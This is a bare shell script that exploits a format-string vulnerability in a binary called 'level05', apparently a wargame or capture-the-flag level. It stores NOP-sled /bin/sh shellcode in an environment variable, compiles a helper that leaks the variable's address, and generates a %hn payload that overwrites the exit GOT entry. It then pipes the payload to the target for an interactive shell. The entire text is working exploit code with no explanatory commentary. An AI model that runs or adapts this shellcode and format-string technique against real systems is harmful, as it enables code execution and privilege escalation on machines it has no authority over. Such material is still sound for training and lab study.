export SHELLCODE=$(python -c 'print "\x90"*1000+"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"')

printf '
#include <stdio.h>
#include <stdlib.h>

int main(void)
{
    printf(\"%%x\", (unsigned int)getenv(\"SHELLCODE\"));
    return 0;
}' > /tmp/env.c

gcc -m32 /tmp/env.c -o /tmp/a.out
/tmp/a.out > /tmp/shellcode_addr

printf '

text = open("/tmp/shellcode_addr").read()    

shell_code_low = int(text[4:],16)
shell_code_high = int(text[:4],16)
exit_addr_high = "\\x08\\x04\\x97\\xe2"
exit_addr_low = "\\x08\\x04\\x97\\xe0"

print(exit_addr_low[::-1] + exit_addr_high[::-1] + ("%%" + str(shell_code_low - 8) + "p") + "%%10$hn" + ("%%" + str(shell_code_high - shell_code_low) + "p") + "%%11$hn")

' > /tmp/exploit.py

(python /tmp/exploit.py; cat) | ./level05